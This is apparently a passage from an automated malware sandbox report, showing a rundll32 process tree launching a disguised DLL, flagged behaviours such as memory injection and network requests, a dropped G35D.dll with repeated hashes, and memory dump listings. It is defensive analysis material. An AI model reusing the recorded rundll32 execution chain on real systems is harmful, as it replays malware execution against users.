              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Froktyco\uyrmjsw.apz",YzwcjBsNjkiUsev
              Suspicious use of WriteProcessMemory
              PID:800
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Froktyco\uyrmjsw.apz",#1
                Blocklisted process makes network request
                Suspicious behavior: EnumeratesProcesses
                PID:992
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
        Execution
          Exfiltration
            Impact
              Initial Access
                Lateral Movement
                  Persistence
                    Privilege Escalation
                      Replay Monitor
                      00:00 00:00
                      Downloads
                      • C:\Users\Admin\Tl41pux\Bmd_p5f\G35D.dll

                        MD5

                        87ab0405dd92650067542696ee0c2c98

                        SHA1

                        204e0200e2c648edf70d90472e0b6c4b15bc58c8

                        SHA256

                        8a87e9ca0011dced9b29abff8ffa438815ed675b7c9fcef3e546109a08f2ab45

                        SHA512

                        2fbb98040f88eb7d3f34157372db49fb7ee933bd63a59d74b1fd91d8ec0eaf065aa8cd69851ec75c2c379e174a3eaaf9d630f847bc525ba61fc127a68454e2d2

                      • \Users\Admin\Tl41pux\Bmd_p5f\G35D.dll

                        MD5

                        87ab0405dd92650067542696ee0c2c98

                        SHA1

                        204e0200e2c648edf70d90472e0b6c4b15bc58c8

                        SHA256

                        8a87e9ca0011dced9b29abff8ffa438815ed675b7c9fcef3e546109a08f2ab45

                        SHA512

                        2fbb98040f88eb7d3f34157372db49fb7ee933bd63a59d74b1fd91d8ec0eaf065aa8cd69851ec75c2c379e174a3eaaf9d630f847bc525ba61fc127a68454e2d2

                      • \Users\Admin\Tl41pux\Bmd_p5f\G35D.dll

                        MD5

                        87ab0405dd92650067542696ee0c2c98

                        SHA1

                        204e0200e2c648edf70d90472e0b6c4b15bc58c8

                        SHA256

                        8a87e9ca0011dced9b29abff8ffa438815ed675b7c9fcef3e546109a08f2ab45

                        SHA512

                        2fbb98040f88eb7d3f34157372db49fb7ee933bd63a59d74b1fd91d8ec0eaf065aa8cd69851ec75c2c379e174a3eaaf9d630f847bc525ba61fc127a68454e2d2

                      • \Users\Admin\Tl41pux\Bmd_p5f\G35D.dll

                        MD5

                        87ab0405dd92650067542696ee0c2c98

                        SHA1

                        204e0200e2c648edf70d90472e0b6c4b15bc58c8

                        SHA256

                        8a87e9ca0011dced9b29abff8ffa438815ed675b7c9fcef3e546109a08f2ab45

                        SHA512

                        2fbb98040f88eb7d3f34157372db49fb7ee933bd63a59d74b1fd91d8ec0eaf065aa8cd69851ec75c2c379e174a3eaaf9d630f847bc525ba61fc127a68454e2d2

                      • \Users\Admin\Tl41pux\Bmd_p5f\G35D.dll

                        MD5

                        87ab0405dd92650067542696ee0c2c98

                        SHA1

                        204e0200e2c648edf70d90472e0b6c4b15bc58c8

                        SHA256

                        8a87e9ca0011dced9b29abff8ffa438815ed675b7c9fcef3e546109a08f2ab45

                        SHA512

                        2fbb98040f88eb7d3f34157372db49fb7ee933bd63a59d74b1fd91d8ec0eaf065aa8cd69851ec75c2c379e174a3eaaf9d630f847bc525ba61fc127a68454e2d2

                      • \Users\Admin\Tl41pux\Bmd_p5f\G35D.dll

                        MD5

                        87ab0405dd92650067542696ee0c2c98

                        SHA1

                        204e0200e2c648edf70d90472e0b6c4b15bc58c8

                        SHA256

                        8a87e9ca0011dced9b29abff8ffa438815ed675b7c9fcef3e546109a08f2ab45

                        SHA512

                        2fbb98040f88eb7d3f34157372db49fb7ee933bd63a59d74b1fd91d8ec0eaf065aa8cd69851ec75c2c379e174a3eaaf9d630f847bc525ba61fc127a68454e2d2

                      • \Users\Admin\Tl41pux\Bmd_p5f\G35D.dll

                        MD5

                        87ab0405dd92650067542696ee0c2c98

                        SHA1

                        204e0200e2c648edf70d90472e0b6c4b15bc58c8

                        SHA256

                        8a87e9ca0011dced9b29abff8ffa438815ed675b7c9fcef3e546109a08f2ab45

                        SHA512

                        2fbb98040f88eb7d3f34157372db49fb7ee933bd63a59d74b1fd91d8ec0eaf065aa8cd69851ec75c2c379e174a3eaaf9d630f847bc525ba61fc127a68454e2d2

                      • \Users\Admin\Tl41pux\Bmd_p5f\G35D.dll

                        MD5

                        87ab0405dd92650067542696ee0c2c98

                        SHA1

                        204e0200e2c648edf70d90472e0b6c4b15bc58c8

                        SHA256

                        8a87e9ca0011dced9b29abff8ffa438815ed675b7c9fcef3e546109a08f2ab45

                        SHA512

                        2fbb98040f88eb7d3f34157372db49fb7ee933bd63a59d74b1fd91d8ec0eaf065aa8cd69851ec75c2c379e174a3eaaf9d630f847bc525ba61fc127a68454e2d2

                      • \Users\Admin\Tl41pux\Bmd_p5f\G35D.dll

                        MD5

                        87ab0405dd92650067542696ee0c2c98

                        SHA1

                        204e0200e2c648edf70d90472e0b6c4b15bc58c8

                        SHA256

                        8a87e9ca0011dced9b29abff8ffa438815ed675b7c9fcef3e546109a08f2ab45

                        SHA512

                        2fbb98040f88eb7d3f34157372db49fb7ee933bd63a59d74b1fd91d8ec0eaf065aa8cd69851ec75c2c379e174a3eaaf9d630f847bc525ba61fc127a68454e2d2

                      • memory/532-6-0x0000000000000000-mapping.dmp

                      • memory/532-11-0x0000000002540000-0x0000000002541000-memory.dmp

                      • memory/532-13-0x000000001ADA4000-0x000000001ADA6000-memory.dmp

                      • memory/532-14-0x0000000002010000-0x0000000002011000-memory.dmp

                      • memory/532-15-0x000000001ACD0000-0x000000001ACD1000-memory.dmp

                      • memory/532-16-0x0000000002910000-0x0000000002911000-memory.dmp

                      • memory/532-10-0x000000001AE20000-0x000000001AE21000-memory.dmp

                      • memory/532-9-0x0000000002380000-0x0000000002381000-memory.dmp

                      • memory/532-8-0x000007FEF57C0000-0x000007FEF61AC000-memory.dmp

                      • memory/532-7-0x000007FEFC2B1000-0x000007FEFC2B3000-memory.dmp

                      • memory/532-12-0x000000001ADA0000-0x000000001ADA2000-memory.dmp

                      • memory/664-25-0x0000000000000000-mapping.dmp

                      • memory/676-43-0x000007FEF7EB0000-0x000007FEF812A000-memory.dmp

                      • memory/696-5-0x0000000000000000-mapping.dmp

                      • memory/800-33-0x0000000000000000-mapping.dmp

                      • memory/844-4-0x000000005FFF0000-0x0000000060000000-memory.dmp

                      • memory/844-3-0x0000000070691000-0x0000000070693000-memory.dmp

                      • memory/844-2-0x0000000072C11000-0x0000000072C14000-memory.dmp

                      • memory/992-37-0x0000000000000000-mapping.dmp

                      • memory/1108-20-0x0000000076881000-0x0000000076883000-memory.dmp

                      • memory/1108-19-0x0000000000000000-mapping.dmp

                      • memory/1108-31-0x0000000000170000-0x0000000000190000-memory.dmp

                      • memory/1108-32-0x0000000010000000-0x0000000010023000-memory.dmp

                      • memory/1128-17-0x0000000000000000-mapping.dmp